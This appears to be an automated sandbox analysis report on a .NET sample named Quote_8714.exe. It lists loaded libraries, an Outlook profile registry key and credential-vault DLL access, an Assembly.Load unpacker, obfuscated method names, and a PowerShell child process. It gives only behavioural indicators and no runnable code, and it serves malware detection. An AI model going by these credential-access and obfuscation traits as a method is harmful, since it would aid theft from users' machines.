Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Quote_8714.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Quote_8714.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quote_8714.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: Quote_8714.exe, 00000000.00000002.1745088291.0000000000D07000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	.Net Code: SUY4jcYG9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	.Net Code: SUY4jcYG9S System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Quote_8714.exe

Code function: 0_2_04FF8220 push eax; mov dword ptr [esp], ecx

0_2_04FF8224

Source: Quote_8714.exe

Static PE information: section name: .text entropy: 7.6318451005062595

Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WQ4pAJNjSwDBRX5WIy.cs	High entropy of concatenated method names: 'kDnXo7emXn', 'QN3X2pyyGW', 'a3AXHt9piL', 'n7HXUa0N1N', 'MXfXQ10sme', 'LGxXv2TBCy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, HoMh05iiChQAZ1pRxMP.cs	High entropy of concatenated method names: 'F6YXNDvln8', 'PMwXzXdGio', 'EZ2Vdd823Z', 'qTyViUIkth', 'd5aVtg2qrc', 'IVdVWtGsZf', 'tEfV4lh7QC', 'L4qVAxFUI0', 'hksVCW4BKn', 'oeNVcKAUjb'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, pDSG7Z6RNajRWGUdxe.cs	High entropy of concatenated method names: 'ToString', 'BC9Pbb4rn9', 'UvpP3NQDfM', 'vF3P0GqWTA', 'yEOPxfb62J', 'nvnP7sMusM', 'OoSPLgkkgA', 'Pv5PrG6XcH', 'HSUPpVfEkh', 'yXuPu71KtJ'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, kx3wCBOTkFcMnULZwX.cs	High entropy of concatenated method names: 'ML8cmJ3KSF', 'Ld6cKS1HtB', 'ShHc6CoR8U', 'OIpcDjTQJF', 'CJOc1rn2r2', 'MmPcnmuKUs', 'iiicZ0pclf', 'BgQc58buXa', 'JtJcwlTm2Z', 'oIjcNTMixR'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, A36R4rupYcOJj6a5du.cs	High entropy of concatenated method names: 'anXUBxOhbO', 'ECeUqe0Q6A', 'uqUUjMSqP0', 'vDAUTVGTSC', 'PrPUYAeOXc', 'ATFUGLUFJ2', 'Dc2UEXIYrJ', 'XAeUOaiXxk', 'abFUIdTxT8', 'n8bU9CWTaO'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	High entropy of concatenated method names: 'FHRWAORp1P', 'pWGWC0ljRl', 'RFLWcJkMJm', 'GMvWoFgd3a', 'LBbW27SjRn', 'zuiWHqfX2Y', 'Ns2WUe2hIK', 'LtDWvhtYyX', 'SoiW8cnHU7', 'b58WRiCdeO'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, VZLNlbmP18FsuuahNn.cs	High entropy of concatenated method names: 'd3CyMlELJX', 'PXLyhPX9hl', 'NE2ym55vwq', 'louyK6tbVF', 'P7My3tHryP', 'WVqy0vLR44', 'FP6yxhFrGZ', 'kXXy7vXOuv', 'OikyLmANyS', 'WXwyrEQm9y'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, uqB3aBLeH1TEZ34xgt.cs	High entropy of concatenated method names: 'f9eH6wE3RO', 'eXaHDMNNtR', 'j7fH1OcLSA', 'ToString', 'vVZHnaPkCS', 'ptGHZAIC8Y', 'J5E6Mr4kDRhdOxhilkt', 'Tiy4xY4sVBxWZVQpbFE'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, U0BU7mcV0JrjRojdkh.cs	High entropy of concatenated method names: 'Dispose', 'L4riw93WH0', 'uktt3C6s9R', 'HsygcI7XJC', 'EZciNh4UJB', 'hRsizKO7Sh', 'ProcessDialogKey', 'y3btdnGHLd', 'HPQtiXnpX8', 'SZott5Q4pA'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, HEIXbZJXBp1cma5btd.cs	High entropy of concatenated method names: 'bjolORhavP', 'mhalIPeeTX', 'CwUlkHuPtJ', 'Id5l34D3R3', 'tXwlxBuMjb', 'CO4l7gXAdT', 'M84lrelsWH', 'O8JlpaYKbh', 'b5WlMqqsQZ', 'aTRlbujQJJ'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, E6e5r1IdQk2jvvoEAf.cs	High entropy of concatenated method names: 'wGyoTPch51', 'zjcoGh3lNH', 'EtwoO5ktwr', 'FbqoITuKrV', 'zSkoykKsRQ', 'MXqoP6FpPC', 'yCCogssZD2', 'BoWoeUavlb', 'tWyoQSTBf0', 'pKboXGh9vU'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, hjRuKNDY9dXEHf7bmN.cs	High entropy of concatenated method names: 'bNKgRL0f7o', 'mtYgFdiVbM', 'ToString', 'jbrgCPWpjX', 'KeBgcQyKfH', 'v8VgoMqDib', 'l5rg2j1rN2', 'djkgHHOQLg', 'lcxgU6QVcY', 'GAfgv9IjJt'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, iEAVY4z9itSu7cK9t2.cs	High entropy of concatenated method names: 'AX3XGVgcVv', 'SFuXO3SpqJ', 'SOgXILHiq4', 'YyEXkyN7vk', 'EsqX3OtHot', 'mSkXxsdyIm', 'jSTX704vQe', 'DjuXSMlKWB', 'jbTXBCVxFk', 'h1kXqUgEoT'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WWcLOJi42BOoN1usNqQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vk9sQNUZpQ', 'xepsXJhJmb', 'w4ksVH7BEk', 'ETgssvROxG', 'AFSsao9mH0', 'gddsfAhFQo', 'XtxsS5ByLv'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, Mys8kS9iAUAbduMY6c.cs	High entropy of concatenated method names: 'iXC2YB9Sa3', 'l9n2Eemfsg', 'MR1o0UuQbt', 'jM6oxFjlKW', 'EMxo78pFII', 'qYvoL1cVQ7', 'XG8orCJxU1', 'Ugqop0EKTT', 'mARouB7ynP', 'gwToMubSGg'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, AOSBQjideAWeZ67TrVV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EPtXbjvo6a', 'OluXhq1hgI', 'nMcXJYLpG0', 'Qi7XmkPKE4', 'l45XKvaxVN', 'b9NX6EHlPg', 'JMIXDHwD2G'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, jSvwXyrAnkZcUZY49A.cs	High entropy of concatenated method names: 'uZQUCWHxpE', 'HERUoPuSeM', 'Er1UHuJNTG', 'RxnHN34Zjr', 'jGFHzJig69', 'YP4Ud0TKMq', 'z6WUiCX1lm', 'URTUtScG1O', 'KOqUWFSuPX', 'oAqU45lR1G'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, U65spvniGlUcp3jsf9.cs	High entropy of concatenated method names: 'nNTg5nYfkK', 'jeugNO7YrY', 'UhPedSG9rF', 'f45eiFYcvO', 'iFPgbT9xKJ', 'icWghamJg2', 't1lgJ1rjge', 'CYTgmLFAIk', 'Hx0gKlm3B9', 'GXeg6L9Sb5'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, wem6B4ttQEhOO9ZEQw.cs	High entropy of concatenated method names: 'mGsjdQ22X', 'hGTT3oDGy', 'v0hG69bPC', 'j07E0Mwoh', 'k4LIv9D3B', 'E8W9wmjRx', 'SxUmsPfFnTyqkoJIfK', 'dwuuxyYk57ygAkonv1', 'Ke4eepfso', 'EBxXvBxri'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, OnGHLdw3PQXnpX8KZo.cs	High entropy of concatenated method names: 'EqSQkLWPgO', 'vbLQ3P1fCi', 'FahQ0FAuKx', 'cXPQxmPK3w', 'SYEQ7bN1GI', 'pJHQLfFm54', 'RK9QrfyQX5', 'cQcQpWy6q8', 'qE2Qu1RVWo', 'ugOQMhNINT'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, jex2upZejp4r93WH0I.cs	High entropy of concatenated method names: 'oD1QyWDH0C', 'VEGQg9N4Yj', 'yWkQQN9cAP', 'TewQVBkag6', 'eN5QaIKeJv', 'cKeQSPsbVl', 'Dispose', 'pLbeCx8xr9', 'rrEecXBCKv', 'peteowU5X4'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, a88XZ145ajYnvP9QjT.cs	High entropy of concatenated method names: 'wpviUx3wCB', 'AkFivcMnUL', 'UdQiRk2jvv', 'hEAiFfpys8', 'MMYiy6cl1s', 'QsdiPA7RVY', 'yrHm0NgIq9dQdCcoOh', 'Thd2hYO6Hupm3QmMWo', 'LrKiiyG9h6', 'CE3iWTP9gd'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, WcnHKDoLJ9tlCFXhZi.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PeHtwgsnkg', 'UCltNFB0Pj', 'bGUtzVbrRo', 'qhKWdnNF55', 'm0GWiOXNcC', 'VNeWt7xRyL', 'KJMWWS2DuU', 'b543b5olEctWdlIWlTB'
Source: 0.2.Quote_8714.exe.3c7a008.5.raw.unpack, n1sJsdkA7RVYAfCH9l.cs	High entropy of concatenated method names: 'MwiHAORBUI', 'ExuHcjA4SE', 'aEjH2nsWHE', 'wetHUWyq4y', 'EC1HvbApGH', 'gMx21H9QqA', 'R4r2nDK1bR', 'SZS2ZoXahm', 'fF225Jf5yM', 'Ss02wTNbZn'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WQ4pAJNjSwDBRX5WIy.cs	High entropy of concatenated method names: 'kDnXo7emXn', 'QN3X2pyyGW', 'a3AXHt9piL', 'n7HXUa0N1N', 'MXfXQ10sme', 'LGxXv2TBCy', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, HoMh05iiChQAZ1pRxMP.cs	High entropy of concatenated method names: 'F6YXNDvln8', 'PMwXzXdGio', 'EZ2Vdd823Z', 'qTyViUIkth', 'd5aVtg2qrc', 'IVdVWtGsZf', 'tEfV4lh7QC', 'L4qVAxFUI0', 'hksVCW4BKn', 'oeNVcKAUjb'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, pDSG7Z6RNajRWGUdxe.cs	High entropy of concatenated method names: 'ToString', 'BC9Pbb4rn9', 'UvpP3NQDfM', 'vF3P0GqWTA', 'yEOPxfb62J', 'nvnP7sMusM', 'OoSPLgkkgA', 'Pv5PrG6XcH', 'HSUPpVfEkh', 'yXuPu71KtJ'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, kx3wCBOTkFcMnULZwX.cs	High entropy of concatenated method names: 'ML8cmJ3KSF', 'Ld6cKS1HtB', 'ShHc6CoR8U', 'OIpcDjTQJF', 'CJOc1rn2r2', 'MmPcnmuKUs', 'iiicZ0pclf', 'BgQc58buXa', 'JtJcwlTm2Z', 'oIjcNTMixR'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, A36R4rupYcOJj6a5du.cs	High entropy of concatenated method names: 'anXUBxOhbO', 'ECeUqe0Q6A', 'uqUUjMSqP0', 'vDAUTVGTSC', 'PrPUYAeOXc', 'ATFUGLUFJ2', 'Dc2UEXIYrJ', 'XAeUOaiXxk', 'abFUIdTxT8', 'n8bU9CWTaO'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, y8LkSCvYhQSRsrhllZ.cs	High entropy of concatenated method names: 'FHRWAORp1P', 'pWGWC0ljRl', 'RFLWcJkMJm', 'GMvWoFgd3a', 'LBbW27SjRn', 'zuiWHqfX2Y', 'Ns2WUe2hIK', 'LtDWvhtYyX', 'SoiW8cnHU7', 'b58WRiCdeO'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, VZLNlbmP18FsuuahNn.cs	High entropy of concatenated method names: 'd3CyMlELJX', 'PXLyhPX9hl', 'NE2ym55vwq', 'louyK6tbVF', 'P7My3tHryP', 'WVqy0vLR44', 'FP6yxhFrGZ', 'kXXy7vXOuv', 'OikyLmANyS', 'WXwyrEQm9y'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, uqB3aBLeH1TEZ34xgt.cs	High entropy of concatenated method names: 'f9eH6wE3RO', 'eXaHDMNNtR', 'j7fH1OcLSA', 'ToString', 'vVZHnaPkCS', 'ptGHZAIC8Y', 'J5E6Mr4kDRhdOxhilkt', 'Tiy4xY4sVBxWZVQpbFE'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, U0BU7mcV0JrjRojdkh.cs	High entropy of concatenated method names: 'Dispose', 'L4riw93WH0', 'uktt3C6s9R', 'HsygcI7XJC', 'EZciNh4UJB', 'hRsizKO7Sh', 'ProcessDialogKey', 'y3btdnGHLd', 'HPQtiXnpX8', 'SZott5Q4pA'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, HEIXbZJXBp1cma5btd.cs	High entropy of concatenated method names: 'bjolORhavP', 'mhalIPeeTX', 'CwUlkHuPtJ', 'Id5l34D3R3', 'tXwlxBuMjb', 'CO4l7gXAdT', 'M84lrelsWH', 'O8JlpaYKbh', 'b5WlMqqsQZ', 'aTRlbujQJJ'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, E6e5r1IdQk2jvvoEAf.cs	High entropy of concatenated method names: 'wGyoTPch51', 'zjcoGh3lNH', 'EtwoO5ktwr', 'FbqoITuKrV', 'zSkoykKsRQ', 'MXqoP6FpPC', 'yCCogssZD2', 'BoWoeUavlb', 'tWyoQSTBf0', 'pKboXGh9vU'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, hjRuKNDY9dXEHf7bmN.cs	High entropy of concatenated method names: 'bNKgRL0f7o', 'mtYgFdiVbM', 'ToString', 'jbrgCPWpjX', 'KeBgcQyKfH', 'v8VgoMqDib', 'l5rg2j1rN2', 'djkgHHOQLg', 'lcxgU6QVcY', 'GAfgv9IjJt'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, iEAVY4z9itSu7cK9t2.cs	High entropy of concatenated method names: 'AX3XGVgcVv', 'SFuXO3SpqJ', 'SOgXILHiq4', 'YyEXkyN7vk', 'EsqX3OtHot', 'mSkXxsdyIm', 'jSTX704vQe', 'DjuXSMlKWB', 'jbTXBCVxFk', 'h1kXqUgEoT'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WWcLOJi42BOoN1usNqQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vk9sQNUZpQ', 'xepsXJhJmb', 'w4ksVH7BEk', 'ETgssvROxG', 'AFSsao9mH0', 'gddsfAhFQo', 'XtxsS5ByLv'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, Mys8kS9iAUAbduMY6c.cs	High entropy of concatenated method names: 'iXC2YB9Sa3', 'l9n2Eemfsg', 'MR1o0UuQbt', 'jM6oxFjlKW', 'EMxo78pFII', 'qYvoL1cVQ7', 'XG8orCJxU1', 'Ugqop0EKTT', 'mARouB7ynP', 'gwToMubSGg'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, AOSBQjideAWeZ67TrVV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'EPtXbjvo6a', 'OluXhq1hgI', 'nMcXJYLpG0', 'Qi7XmkPKE4', 'l45XKvaxVN', 'b9NX6EHlPg', 'JMIXDHwD2G'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, jSvwXyrAnkZcUZY49A.cs	High entropy of concatenated method names: 'uZQUCWHxpE', 'HERUoPuSeM', 'Er1UHuJNTG', 'RxnHN34Zjr', 'jGFHzJig69', 'YP4Ud0TKMq', 'z6WUiCX1lm', 'URTUtScG1O', 'KOqUWFSuPX', 'oAqU45lR1G'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, U65spvniGlUcp3jsf9.cs	High entropy of concatenated method names: 'nNTg5nYfkK', 'jeugNO7YrY', 'UhPedSG9rF', 'f45eiFYcvO', 'iFPgbT9xKJ', 'icWghamJg2', 't1lgJ1rjge', 'CYTgmLFAIk', 'Hx0gKlm3B9', 'GXeg6L9Sb5'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, wem6B4ttQEhOO9ZEQw.cs	High entropy of concatenated method names: 'mGsjdQ22X', 'hGTT3oDGy', 'v0hG69bPC', 'j07E0Mwoh', 'k4LIv9D3B', 'E8W9wmjRx', 'SxUmsPfFnTyqkoJIfK', 'dwuuxyYk57ygAkonv1', 'Ke4eepfso', 'EBxXvBxri'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, OnGHLdw3PQXnpX8KZo.cs	High entropy of concatenated method names: 'EqSQkLWPgO', 'vbLQ3P1fCi', 'FahQ0FAuKx', 'cXPQxmPK3w', 'SYEQ7bN1GI', 'pJHQLfFm54', 'RK9QrfyQX5', 'cQcQpWy6q8', 'qE2Qu1RVWo', 'ugOQMhNINT'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, jex2upZejp4r93WH0I.cs	High entropy of concatenated method names: 'oD1QyWDH0C', 'VEGQg9N4Yj', 'yWkQQN9cAP', 'TewQVBkag6', 'eN5QaIKeJv', 'cKeQSPsbVl', 'Dispose', 'pLbeCx8xr9', 'rrEecXBCKv', 'peteowU5X4'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, a88XZ145ajYnvP9QjT.cs	High entropy of concatenated method names: 'wpviUx3wCB', 'AkFivcMnUL', 'UdQiRk2jvv', 'hEAiFfpys8', 'MMYiy6cl1s', 'QsdiPA7RVY', 'yrHm0NgIq9dQdCcoOh', 'Thd2hYO6Hupm3QmMWo', 'LrKiiyG9h6', 'CE3iWTP9gd'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, WcnHKDoLJ9tlCFXhZi.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PeHtwgsnkg', 'UCltNFB0Pj', 'bGUtzVbrRo', 'qhKWdnNF55', 'm0GWiOXNcC', 'VNeWt7xRyL', 'KJMWWS2DuU', 'b543b5olEctWdlIWlTB'
Source: 0.2.Quote_8714.exe.76d0000.7.raw.unpack, n1sJsdkA7RVYAfCH9l.cs	High entropy of concatenated method names: 'MwiHAORBUI', 'ExuHcjA4SE', 'aEjH2nsWHE', 'wetHUWyq4y', 'EC1HvbApGH', 'gMx21H9QqA', 'R4r2nDK1bR', 'SZS2ZoXahm', 'fF225Jf5yM', 'Ss02wTNbZn'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
